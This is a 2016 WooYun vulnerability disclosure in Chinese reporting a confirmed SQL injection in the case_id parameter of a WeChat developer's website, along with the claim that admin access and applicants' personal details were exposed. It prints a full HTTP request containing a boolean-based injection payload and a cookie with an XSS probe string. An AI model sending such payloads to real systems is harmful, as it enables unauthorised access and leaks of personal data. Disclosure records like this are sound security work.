当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0209292

漏洞标题:某微信第三方开发商官网存在SQL注入漏洞(可影响后台众多申请人代理人资料)

相关厂商:weiba66.com

漏洞作者: 路人甲

提交时间:2016-05-19 14:15

修复时间:2016-07-07 09:50

公开时间:2016-07-07 09:50

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-19: 细节已通知厂商并且等待厂商处理中
2016-05-23: 厂商已经确认,细节仅向厂商公开
2016-06-02: 细节向核心白帽子及相关领域专家公开
2016-06-12: 细节向普通白帽子公开
2016-06-22: 细节向实习白帽子公开
2016-07-07: 细节向公众公开

简要描述:

某微信第三方开发商官网存在SQL注入漏洞(可影响后台众多申请人代理人资料)

详细说明:

一个post注入,已经进后台了,admin.weiba66.com
账号密码

mask 区域
*****llen6*****
*****wangj*****


注入点

POST /service/ajaxLink HTTP/1.1
Content-Length: 46
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.weiba66.com:80/
Cookie: ag_session=IPQAQEpeOTjHpI5NJZ6jeopnuavvO%2F93HCWVgcDugTz4WxDk9aEp5Q07xY4ivjWFYPFpGabHpf4o4Nwa12CMyvuZvOHRbHOPxZH1Ls%2BCSCrQs%2BWP9j8GV9drOOTsqzNPD3numUHhOAnrHJ7TBxRerg%2FhTQOsnqORy3w1Viv6pOtchCjAC0ftC35%2FuYDp4qcC1eyZDF9ifIVV78lr8kp8SBCim0VMvXr%2F2AF%2F9giR0ZyNlrH%2FktmpPLOxg9xZHwV%2FuGVhw8JXDaMUMVkXvyTFEtt%2BILfEuSiXfyRp6L%2BymeZFd2sTNJi6pr2tDZPxh2Citp37EdPeukfx3iDu3CWm84DTRe3Zlx1%2BE3XzpROq2xlrHGB5ESJnEj7K62lRzVnAUPGZoT%2FdJzVs6PKX9i4iKCyevBOVjte%2BSR3GiSnKhXf83nrj5Wn5OX%2F6BIEOZTu0pZw9mYm%2B2AUxmQ%2BcQH2ZC8VDkY8JUgRXeNK88C5PtEaDCW0NjMcJo8Wp0sF7BFvW8z7%2F5no7DTLMtr3Cc9feU6JFZfta7qYBADJ2N%2FEFxAZrzulj9kNcpaC5JbY7%2F1WoGuKAOaowoFtzQZ%2BENyM5kQh5EfQQc6703g2cXyPvW%2F%2BuAD6BKu2Ui5jcRnZAydiY; Hm_lvt_7e0672c2bc0acf201df277a0e9268004=1463220277,1463220684,1463220776,1463220800; Hm_lpvt_7e0672c2bc0acf201df277a0e9268004=1463220800; CNZZDATA1253384856=462479786-1463217860-http%253A%252F%252Fwww.acunetix-referrer.com%252F%7C1463217860; _jzqx=1.1463218977.1463218977.1.jzqsr=acunetix-referrer%2Ecom|jzqct=/javascript:domxssexecutionsink(0,"'\"><xsstag>()refdxss").-; _jzqckmp=1; _jzqa=1.920430318093333200.1463218844.1463218844.1463218844.1; _jzqc=1; _qzja=1.1925184389.1463218844224.1463218844224.1463218844224.1463220400516.1463220400638.0.0.0.15.1; _qzjb=1.1463218844224.15.0.0.0; _qzjc=1; _qzjto=15.1.0; _jzqb=1.10.10.1463218844.1; HMACCOUNT=A4D7CEFE20A00F10; qv_swfrfh=; qv_swfrfc=v20; qv_swfrfu=; v=ADM^ifaQD9:6yw9%wV%D; web_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%225ce3b840d839df336f657de0c795ffc5%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%2214.121.122.124%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1463219209%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7De6d8af05e9ecf42f2fe88aa12a2800ca; Hm_lvt_5a4ba5491f78d218dd191f1bdc025828=1463219220; Hm_lpvt_5a4ba5491f78d218dd191f1bdc025828=1463219220; bdshare_firstime=1463219544832; BAIDUID=D53A2A20AD43D3236488985893BC8197:FG=1; cna=seW9D7eKfzYCAQ55enzgKzuC; sca=dab3f7a4; atpsida=d5293f1b9f17e8bb1fa59193_1463220145
Host: www.weiba66.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
case_id=86%20AND%203*2*1%3d6%20AND%20105%3d105


case_id参数有问题

1.png


2.png


3.png


泄露众多申请人联系方式姓名

4.png

5.png


6.png


7.png


8.png

漏洞证明:

1.png


2.png


3.png


4.png

5.png


6.png


7.png


8.png

修复方案:

我比较菜你们自己弄下吧

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-05-23 09:40

厂商回复:

感谢指正

最新状态:

暂无